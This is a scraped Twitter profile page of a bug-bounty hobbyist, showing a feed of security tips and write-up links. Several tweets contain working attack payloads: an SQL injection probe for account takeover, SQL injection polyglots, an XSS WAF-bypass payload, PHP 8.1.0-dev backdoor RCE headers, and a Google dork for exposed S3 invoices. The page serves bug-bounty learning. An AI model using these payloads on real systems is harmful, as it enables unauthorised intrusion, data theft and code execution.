diablo_237 (@akash__rg) 's Twitter Profile
diablo_237

@akash__rg

Cyber security Enthusiastic | pursuing bug hunter |

ID: 1294118429742567425

linkhttps://tryhackme.com/p/diablo237 calendar_today14-08-2020 03:48:13

1,1K Tweet

57 Followers

307 Following

Kullai⚡️ (@kullai12) 's Twitter Profile Photo

Found SQL Injection to Account Takeover Manually :) 1. Enter mobile number to login intercept {"mobile_number":"8888888888"} >> 200 {"mobile_number":"8888888888'"} >> 500 {"mobile_number":"8888888888''"} >> 200 #bugbountytips

Found SQL Injection to Account Takeover Manually :) 
1. Enter mobile number to login intercept
{"mobile_number":"8888888888"} >> 200
{"mobile_number":"8888888888'"} >> 500
{"mobile_number":"8888888888''"} >> 200

#bugbountytips
Aditya Shende (@adityashende17) 's Twitter Profile Photo

Dorking Clouds 🌩️ Have you thought of targeting Google Dorking techniques for cloud storage, CDNs, and more. Check out these 👇 Find Invoices site:*.s3.amazonaws.com -www Uber Invoice Breakdown: -Targets Amazon S3 buckets with Uber-related invoice files. -Excludes common

Dorking Clouds 🌩️

Have you thought of targeting Google Dorking techniques for cloud storage, CDNs, and more. Check out these 👇

Find Invoices
site:*.s3.amazonaws.com -www Uber Invoice 

Breakdown:
-Targets Amazon S3 buckets with Uber-related invoice files.
-Excludes common
daniel (@hackermondev) 's Twitter Profile Photo

1 Bug, $50K+ in bounties: how Zendesk left a backdoor in hundreds of companies #bugbountytips gist.github.com/hackermondev/6…

Erick Fernando (@erickfernandox) 's Twitter Profile Photo

If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[]. Payload: <a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)> #Bugbounty #AkamaiBypass

If the WAF doesn't allow the creation of a JavaScript term like 'alert' or 'confirm' in any way, write it inverted and then use reverse() with self[].

Payload:

&lt;a%20href=%0dj&amp;Tab;avascript&amp;colon;x='trela'.split('').reverse().join('');self[x](origin)&gt;

#Bugbounty #AkamaiBypass
Godfather Orwa 🇯🇴 (@godfatherorwa) 's Twitter Profile Photo

Slides of my talk in Security BSides Ahmedabad I hope you like it and found it a little bit useful docs.google.com/presentation/d… #bugbounty #bugbountytip #bugbountytips #infosec Thanks for support for all of you and Security BSides Ahmedabad & bugcrowd

Arshiya (@arshiyaiha) 's Twitter Profile Photo

Common vulnerabilities in Wordpress sites with severity for report #bugbounty. 1.Configuration File Leakage 2.Admin Username enumeration via REST API 3.Enable Xmlrpc.php 4.Vulnerable upload plugin #bugbountytip #hack #wordpress medium.com/@sriharanmahim…

Md Ismail Šojal 🕷️ (@0x0sojalsec) 's Twitter Profile Photo

If you find PHP 8.1.0-dev then try RCE & SQLi User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbounty #bugbountytips #rce #sqli

If you find PHP 8.1.0-dev then try RCE &amp; SQLi
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');

#bugbounty #bugbountytips #rce #sqli
Emad Shanab - أبو عبد الله (@alra3ees) 's Twitter Profile Photo

getSubsidiaries:- Get list of subsidiaries for a selected company. This is useful for recon of wide scope bug bounty targets. github.com/xnl-h4ck3r/get…

Intigriti (@intigriti) 's Twitter Profile Photo

JS0N Haddix Lupin PortSwigger That was it! We hope you've learned something new (and enjoyed) this thread! If you have enjoyed this thread: 1. Follow us Intigriti for more of these threads! 🐛 2. Retweet the first Tweet to share it with your friends 💙

SULTAN 🇸🇦 (@sf7dev) 's Twitter Profile Photo

🛑 How I turned a "Simple Search" feature into a Blind IDOR that exposed sensitive information for over 20k users in just 2 minutes! 🛑 Have you heard of a vulnerability called Blind IDOR? Sounds strange, right? Today, I’m going to talk about a vulnerability I discovered in one

🛑 How I turned a "Simple Search" feature into a Blind IDOR that exposed sensitive information for over 20k users in just 2 minutes! 🛑

Have you heard of a vulnerability called Blind IDOR? Sounds strange, right?

Today, I’m going to talk about a vulnerability I discovered in one
Jason Haddix (@jhaddix) 's Twitter Profile Photo

Day TWO of FIVE days of celebrating our 2 year ARCANUM-VERSARY! Arcanum Information Security 3rd Giveaway = FOUR seats to our new course by the_IDORminator "Zero to [BAC] Hero" ! 👍 1 Like = 1 Entry! ♻️ 1 Share = 2 Entries! Winners announced 1/21! Syllabus link below 👇

Day TWO of FIVE days of celebrating our 2 year ARCANUM-VERSARY! <a href="/arcanuminfosec/">Arcanum Information Security</a> 

3rd Giveaway = FOUR seats to our new course by <a href="/the_IDORminator/">the_IDORminator</a>  "Zero to [BAC] Hero" !

👍 1 Like = 1 Entry!
♻️ 1 Share =  2 Entries!

Winners announced 1/21!  Syllabus link below 👇
Mohamed Reda Desoky (@mrdesoky0) 's Twitter Profile Photo

Great work Godfather Orwa 🇯🇴 This is a solid bypass. I recently wrote a write-up on a similar Stored XSS via PDF I found in Sep 2025: medium.com/@mrdesoky0/sto… Keep it up 🔥

André Baptista (@0xacb) 's Twitter Profile Photo

404 page to RCE. A report by spaceraccoon | Eugene Lim He chained two old CVEs to achieve RCE: - Found a 404 page mentioning an obscure CMS, discovered /josso/signin login - Triggered CVE-2007-0450 (directory traversal in mod_proxy) using a %5C../ to bypass the internal proxy - Reached

Harley (@infinitelogins) 's Twitter Profile Photo

A misconfigured “Login with Google” gave any Google user access to the admin console of an AI children’s toy, exposing every child’s conversations, family data, and remote device controls. Read more about this in Joseph Thacker's latest blog. Full write-up 👇 josephthacker.com/hacking/2026/0…

Brute Logic (@brutelogic) 's Twitter Profile Photo

#SQL Injection Polyglots (Tested on MySQL & MariaDB) &1/*'/*"/**/||1#\ and-1/*'/*"/**/||1--+\ It performs injection on single and double quotes scenarios plus quoteless ones (where the injection lands in 2 consecutive points of the query). Use it in ALL input fields at once.

Clement 'Tino (@tinopreter) 's Twitter Profile Photo

$4,500 in March isn’t much. Good thing is, April gives us another chance to go harder. Take some time and read about how a simple $500 Email verification bypass was escalated into a $1,500 because I kept expanding the impact through other reports. 🔗 medium.com/@tinopreter/fr…

$4,500 in March isn’t much. Good thing is, April gives us another chance to go harder. 

Take some time and read about how a simple $500 Email verification bypass was escalated into a $1,500 because I kept expanding the impact through other reports. 
🔗 medium.com/@tinopreter/fr…